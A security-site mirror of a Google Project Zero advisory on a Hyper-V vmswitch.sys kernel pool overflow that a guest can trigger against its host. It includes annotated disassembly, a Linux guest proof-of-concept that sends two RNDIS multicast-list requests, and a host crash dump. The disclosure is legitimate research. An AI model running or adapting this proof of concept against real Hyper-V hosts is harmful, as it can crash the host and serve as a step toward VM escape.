首页 | 安全文章 | 安全工具 | Exploits | 本站原创 | 关于我们 | 网站地图 | 安全论坛
  当前位置:主页>安全文章>文章资料>Exploits>文章内容
Hyper-V - vmswitch.sys VmsMpCommonPvtHandleMulticastOids Guest to Host Kernel-Po
来源:Google Security Research 作者:Google 发布时间:2016-04-21  
/*
Source: https://bugs.chromium.org/p/project-zero/issues/detail?id=688
 
This function is reachable by sending a RNDIS Set request with OID 0x01010209 (OID_802_3_MULTICAST_LIST) from the Guest to the Host.
 
This function potentially allocates a buffer based on the addresses sent.
The number of entries is determined by dividing the length of the data by 6:
 
.text:000000000001D717 mov eax, 0AAAAAAABh
.text:000000000001D71C mov r13b, 1
.text:000000000001D71F mul r14d
.text:000000000001D722 mov ebp, edx
.text:000000000001D724 shr ebp, 2
.text:000000000001D727 test ebp, ebp ; ebp=r14d//6
.text:000000000001D729 jz loc_31B04
.text:000000000001D72F
.text:000000000001D72F loc_1D72F: ; CODE XREF: VmsMpCommonPvtHandleMulticastOids+144CEj
.text:000000000001D72F cmp ebp, [rbx+0EE8h]
.text:000000000001D735 jz loc_31B2B
.text:000000000001D73B mov r8d, 'mcMV' ; Tag
.text:000000000001D741 mov rdx, r14 ; NumberOfBytes
.text:000000000001D744 mov ecx, 200h ; PoolType
.text:000000000001D749 mov r12, r14
.text:000000000001D74C call cs:__imp_ExAllocatePoolWithTag .text:000000000001D752 mov r14, rax
.text:000000000001D755 test rax, rax
.text:000000000001D758 jz loc_1D7E8
.text:000000000001D75E mov r8, r12 ; Size
.text:000000000001D761 mov rdx, r15 ; Src
.text:000000000001D764 mov rcx, rax ; Dst
.text:000000000001D767 call memmove
 
An interesting test is located at 0x1D72F.
If the number of entries is identical to the currently stored one, then we jump to this piece of code:
 
.text:0000000000031B2B loc_31B2B: ; CODE XREF: VmsMpCommonPvtHandleMulticastOids+F5j
.text:0000000000031B2B mov rcx, [rbx+0EE0h] ; Dst
.text:0000000000031B32 mov r8, r14 ; Size
.text:0000000000031B35 mov rdx, r15 ; Src
.text:0000000000031B38 call memmove
 
Note that the size of the copy operation is the size of the data. As the division is dropping the remainder component, we can overflow the allocation by 1 to 5 bytes doing the following:
- call this function with data of size 6*x
- call this function again with size 6*x+y with 1<=y<=5
  - then 6*x bytes will be allocated and stored at 0xee0
  - and x will be saved at 0xee8;
  - x will be compared with what is at 0xee8
  - being equal it will proceed copying 6*x+y in a buffer of 6*x bytes at 0xee0
 
If exploited successfully (not sure if it's doable), it would lead to code execution in the context of the Host R0.
 
Please note that this issue has been silently fixed in Windows Server 2016 TP4 (and maybe prior).
 
PoC (put it and call it somewhere useful in rndis_filter.c):
*/
 
static int rndis_pool_overflow(struct rndis_device *rdev)
{
  int ret;
  struct net_device *ndev = rdev->net_dev->ndev;
  struct rndis_request *request;
  struct rndis_set_request *set;
  struct rndis_set_complete *set_complete;
  u32 extlen = 16 * 6;
  unsigned long t;
 
  request = get_rndis_request(
    rdev, RNDIS_MSG_SET,
    RNDIS_MESSAGE_SIZE(struct rndis_set_request) + extlen);
 
  if (!request)
    return -ENOMEM;
 
  set = &request->request_msg.msg.set_req;
  set->oid = 0x01010209; // OID_802_3_MULTICAST_LIST
  set->info_buflen = extlen;
  set->info_buf_offset = sizeof(struct rndis_set_request);
  set->dev_vc_handle = 0;
 
  ret = rndis_filter_send_request(rdev, request);
  if (ret != 0)
    goto cleanup;
 
  t = wait_for_completion_timeout(&request->wait_event, 5*HZ);
  if (t == 0)
    return -ETIMEDOUT;
  else {
    set_complete = &request->response_msg.msg.set_complete;
    if (set_complete->status != RNDIS_STATUS_SUCCESS) {
      printk(KERN_INFO "failed to set multicast list: 0x%x\n",
        set_complete->status);
      ret = -EINVAL;
    }
  }
 
  put_rndis_request(rdev, request);
  request = get_rndis_request(rdev, RNDIS_MSG_SET,
    RNDIS_MESSAGE_SIZE(struct rndis_set_request) + extlen + 5);
 
  if (!request)
    return -ENOMEM;
 
  set = &request->request_msg.msg.set_req;
  set->oid = 0x01010209; // OID_802_3_MULTICAST_LIST
  set->info_buflen = extlen + 5;
  set->info_buf_offset = sizeof(struct rndis_set_request);
  set->dev_vc_handle = 0;
 
  ret = rndis_filter_send_request(rdev, request);
  if (ret != 0)
    goto cleanup;
 
  t = wait_for_completion_timeout(&request->wait_event, 5*HZ);
  if (t == 0)
    return -ETIMEDOUT;
  else {
    set_complete = &request->response_msg.msg.set_complete;
    if (set_complete->status != RNDIS_STATUS_SUCCESS) {
      printk(KERN_INFO "failed to set multicast list: 0x%x\n",
        set_complete->status);
      ret = -EINVAL;
    }
 }
 
cleanup:
  put_rndis_request(rdev, request);
 
  return ret;
}
 
/*
Crash dump (with Special Pool enabled for vmswitch.sys):
 
7: kd> !analyze -v
 
*******************************************************************************
 
* *
 
* Bugcheck Analysis *
 
* *
 
*******************************************************************************
 
DRIVER_IRQL_NOT_LESS_OR_EQUAL (d1)
 
An attempt was made to access a pageable (or completely invalid) address at an
 
interrupt request level (IRQL) that is too high. This is usually
 
caused by drivers using improper addresses.
 
If kernel debugger is available get stack backtrace.
 
Arguments:
 
Arg1: ffffcf81085c9000, memory referenced
 
Arg2: 0000000000000002, IRQL
 
Arg3: 0000000000000001, value 0 = read operation, 1 = write operation
 
Arg4: fffff8005fad3249, address which referenced memory
 
Debugging Details:
 
------------------
 
DUMP_CLASS: 1
 
DUMP_QUALIFIER: 401
 
BUILD_VERSION_STRING: 9600.18146.amd64fre.winblue_ltsb.151121-0600
 
...
 
BASEBOARD_VERSION:
 
DUMP_TYPE: 1
 
BUGCHECK_P1: ffffcf81085c9000
 
BUGCHECK_P2: 2
 
BUGCHECK_P3: 1
 
BUGCHECK_P4: fffff8005fad3249
 
WRITE_ADDRESS: ffffcf81085c9000 Special pool
 
CURRENT_IRQL: 2
 
FAULTING_IP:
 
vmswitch!memcpy+49
 
fffff800`5fad3249 8841ff mov byte ptr [rcx-1],al
 
CPU_COUNT: 8
 
CPU_MHZ: c88
 
CPU_VENDOR: GenuineIntel
 
CPU_FAMILY: 6
 
CPU_MODEL: 1a
 
CPU_STEPPING: 4
 
CPU_MICROCODE: 6,1a,4,0 (F,M,S,R) SIG: 11'00000000 (cache) 11'00000000 (init)
 
DEFAULT_BUCKET_ID: WIN8_DRIVER_FAULT
 
BUGCHECK_STR: AV
 
PROCESS_NAME: System
 
ANALYSIS_SESSION_HOST: KOSTYAK-G7700
 
ANALYSIS_SESSION_TIME: 12-31-2015 21:26:14.0206
 
ANALYSIS_VERSION: 10.0.10586.567 amd64fre
 
TRAP_FRAME: ffffd00187f46840 -- (.trap 0xffffd00187f46840)
 
NOTE: The trap frame does not contain all registers.
 
Some register values may be zeroed or incorrect.
 
rax=0000000055555500 rbx=0000000000000000 rcx=ffffcf81085c9001
 
rdx=0000000000001fc0 rsi=0000000000000000 rdi=0000000000000000
 
rip=fffff8005fad3249 rsp=ffffd00187f469d8 rbp=0000000000000010
 
r8=0000000000000004 r9=0000000000000000 r10=0000000000000000
 
r11=ffffcf81085c8fa0 r12=0000000000000000 r13=0000000000000000
 
r14=0000000000000000 r15=0000000000000000
 
iopl=0 nv up ei pl nz na pe nc
 
vmswitch!memcpy+0x49:
 
fffff800`5fad3249 8841ff mov byte ptr [rcx-1],al ds:ffffcf81`085c9000=??
 
Resetting default scope
 
LAST_CONTROL_TRANSFER: from fffff8038a3633e9 to fffff8038a3578a0
 
STACK_TEXT:
 
ffffd001`87f466f8 fffff803`8a3633e9 : 00000000`0000000a ffffcf81`085c9000 00000000`00000002
 
00000000`00000001 : nt!KeBugCheckEx
 
ffffd001`87f46700 fffff803`8a361c3a : 00000000`00000001 ffffe000`57002000 ffffd001`87f46900
 
00000000`00000004 : nt!KiBugCheckDispatch+0x69
 
ffffd001`87f46840 fffff800`5fad3249 : fffff800`5fad9b3d ffffe000`57002000 00000000`0000000c
 
ffffe000`57002000 : nt!KiPageFault+0x23a
 
ffffd001`87f469d8 fffff800`5fad9b3d : ffffe000`57002000 00000000`0000000c ffffe000`57002000
 
ffffd001`87f46b00 : vmswitch!memcpy+0x49
 
ffffd001`87f469e0 fffff800`5fac4792 : 00000000`00000000 ffffd001`87f46ac0 00000000`01000400
 
ffffe000`57002000 : vmswitch!VmsMpCommonPvtHandleMulticastOids+0x144fd
 
ffffd001`87f46a60 fffff800`5fac3dc4 : 00000000`c00000bb 00000000`01010209 ffffcf81`06b62c78
 
00000000`000000d0 : vmswitch!VmsMpCommonPvtSetRequestCommon+0x13e
 
ffffd001`87f46af0 fffff800`5fac3cf9 : ffffcf81`06b62b00 00000000`00000000 fffff800`5fac3a20
 
ffffe000`53d8d880 : vmswitch!VmsMpCommonSetRequest+0xa4
 
ffffd001`87f46b60 fffff800`5fac3e8b : 00000000`00000000 fffff800`00000000 ffffe000`57005c10
 
ffff68b8`dcfa8dfd : vmswitch!VmsVmNicPvtRndisDeviceSetRequest+0x55
 
ffffd001`87f46bb0 fffff800`5fac3aa3 : ffffe000`570c5f70 ffffe000`53d8d9c0 ffffe000`53d8d880
 
fffff803`8a29b9f9 : vmswitch!RndisDevHostHandleSetMessage+0x77
 
ffffd001`87f46bf0 fffff803`8a2ee2a3 : ffffcf81`06b58fb0 ffffe000`57005c10 00000000`00000000
 
ffffe000`00000000 : vmswitch!RndisDevHostControlMessageWorkerRoutine+0x83
 
ffffd001`87f46c20 fffff803`8a2984bf : fffff800`5e842e00 fffff803`8a2ee1a8 ffffe000`53d8d880
 
00000000`00000000 : nt!IopProcessWorkItem+0xfb
 
ffffd001`87f46c90 fffff803`8a305554 : 00000000`00000000 ffffe000`53d8d880 00000000`00000080
 
ffffe000`53d8d880 : nt!ExpWorkerThread+0x69f
 
ffffd001`87f46d40 fffff803`8a35dec6 : ffffd001`88741180 ffffe000`53d8d880 ffffd001`8874d3c0
 
00000000`00000000 : nt!PspSystemThreadStartup+0x58
 
ffffd001`87f46da0 00000000`00000000 : ffffd001`87f47000 ffffd001`87f41000 00000000`00000000
 
00000000`00000000 : nt!KiStartSystemThread+0x16
 
STACK_COMMAND: kb
 
THREAD_SHA1_HASH_MOD_FUNC: abaf49d1b3c5b02fccc8786e1ffe670ffc7abc52
 
THREAD_SHA1_HASH_MOD_FUNC_OFFSET: 95f6cd8078b8f21385352dcdeabdb4de53e87ac0
 
THREAD_SHA1_HASH_MOD: 7e0f522feda778d9b7c0da52391383d6f8569ca6
 
FOLLOWUP_IP:
 
vmswitch!memcpy+49
 
fffff800`5fad3249 8841ff mov byte ptr [rcx-1],al
 
FAULT_INSTR_CODE: 75ff4188
 
SYMBOL_STACK_INDEX: 3
 
SYMBOL_NAME: vmswitch!memcpy+49
 
FOLLOWUP_NAME: MachineOwner
 
MODULE_NAME: vmswitch
 
IMAGE_NAME: vmswitch.sys
 
DEBUG_FLR_IMAGE_TIMESTAMP: 55c21a2e
 
BUCKET_ID_FUNC_OFFSET: 49
 
FAILURE_BUCKET_ID: AV_VRF_vmswitch!memcpy
 
BUCKET_ID: AV_VRF_vmswitch!memcpy
 
PRIMARY_PROBLEM_CLASS: AV_VRF_vmswitch!memcpy
 
TARGET_TIME: 2016-01-01T05:23:07.000Z
 
OSBUILD: 9600
 
OSSERVICEPACK: 0
 
SERVICEPACK_NUMBER: 0
 
OS_REVISION: 0
 
SUITE_MASK: 272
 
PRODUCT_TYPE: 3
 
OSPLATFORM_TYPE: x64
 
OSNAME: Windows 8.1
 
OSEDITION: Windows 8.1 Server TerminalServer SingleUserTS
 
OS_LOCALE:
 
USER_LCID: 0
 
OSBUILD_TIMESTAMP: 2015-11-21 08:42:09
 
BUILDDATESTAMP_STR: 151121-0600
 
BUILDLAB_STR: winblue_ltsb
 
BUILDOSVER_STR: 6.3.9600.18146.amd64fre.winblue_ltsb.151121-0600
 
ANALYSIS_SESSION_ELAPSED_TIME: 465
 
ANALYSIS_SOURCE: KM
 
FAILURE_ID_HASH_STRING: km:av_vrf_vmswitch!memcpy
 
FAILURE_ID_HASH: {f6dcfc99-d58f-1ff6-59d1-7239f62b292b}
 
Followup: MachineOwner
 
---------
*/
 
[推荐] [评论(0条)] [返回顶部] [打印本页] [关闭窗口]  
匿名评论
评论内容:(不能超过250字,需审核后才会公布,请自觉遵守互联网相关政策法规。
 §最新评论:
  热点文章
·CVE-2012-0217 Intel sysret exp
·Linux Kernel 2.6.32 Local Root
·Array Networks vxAG / xAPV Pri
·Novell NetIQ Privileged User M
·Array Networks vAPV / vxAG Cod
·Excel SLYK Format Parsing Buff
·PhpInclude.Worm - PHP Scripts
·Apache 2.2.0 - 2.2.11 Remote e
·VideoScript 3.0 <= 4.0.1.50 Of
·Yahoo! Messenger Webcam 8.1 Ac
·Family Connections <= 1.8.2 Re
·Joomla Component EasyBook 1.1
  相关文章
·PHPBack 1.3.0 - SQL Injection
·Symantec Brightmail 10.6.0-7-
·Novell ServiceDesk Authenticat
·Gemtek CPE7000 / WLTCS-106 - M
·Internet Explorer 11 - MSHTML!
·Microsoft Windows 7-10 & Serve
·Exim perl_startup Privilege Es
·libgd 2.1.1 Signedness
·Internet Explorer 9, 10, 11 -
·Advantech WebAccess 8.0 Dashbo
·Dell KACE K1000 File Upload
·Gemtek CPE7000 - WLTCS-106 Adm
  推荐广告
CopyRight © 2002-2022 VFocuS.Net All Rights Reserved